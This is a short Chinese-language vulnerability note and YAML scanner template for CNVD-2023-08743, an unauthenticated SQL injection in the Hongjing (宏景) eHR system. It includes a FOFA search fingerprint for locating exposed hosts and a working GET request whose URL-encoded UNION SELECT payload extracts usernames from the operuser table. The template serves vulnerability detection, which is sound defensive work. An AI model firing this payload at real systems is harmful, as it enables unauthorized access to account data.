漏洞描述
宏景人力系统 存在SQL注入漏洞(CNVD-2023-08743),未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
FOFA: body='<div class="hj-hy-all-one-logo"'
id: CNVD-2023-08743
info:
name: 宏景 eHR SQL 注入漏洞
author: oxsonder
severity: high
verified: true
description: |
宏景人力系统 存在SQL注入漏洞(CNVD-2023-08743),未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
FOFA: body='<div class="hj-hy-all-one-logo"'
reference:
- https://mp.weixin.qq.com/s/NhJe4MUepwqc6SmDJw4aow
- https://mp.weixin.qq.com/s/N5qe_tuqRC1QxwX6RvvXeg
tags: hjsoft,cve,cve2023,sqli
created: 2023/06/22
set:
randstr: randomLowercase(12)
rules:
r0:
request:
method: GET
path: /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d
expression: |
response.status == 200 &&
response.body.bcontains(b'TreeNode id=') &&
response.body.bcontains(b'text=')
expression: r0()